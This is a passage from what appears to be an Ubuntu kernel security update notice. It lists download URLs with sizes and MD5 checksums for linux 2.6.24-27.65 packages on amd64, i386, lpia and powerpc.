  http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   145458 3e087634d61556643c32e342214a0642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb\n      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    26794 50bb7020338de7d00265de0765578291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32672 7135f346092b651dafed111b91aee44d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    47602 e55422dc48484675642c96bdbc673595\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  2089276 69416120cd161789b598b2b93034db07\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb\n      Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb\n      Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb\n      Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb\n      Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb\n      Size/MD5:   707576 d26794effd4e857da1db4d28e9407611\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   163034 9cc84b270528d0fef36320974b415392\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   236710 755a3caeceece8650e46706804c6e072\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   150836 169c287e6bc754d02924a719d34aad29\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   156072 9ff98bc4b62d033785de95858201c353\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    33388 860c1b56a45914246929757c815f5ec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    92446 6525df043e2a865a6eb646f015140e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb\n      Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb\n      Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb\n      Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb\n      Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb\n      Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b\n    http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb\n      Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   334046 06512921aae848be603af54dc56f72e6\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    62718 e53308b729496be4a0e343535769c74e\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   105746 034c14e0418581e1b8b56913246e96de\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   704830 ef370acc49192e464ef553984e361d88\n    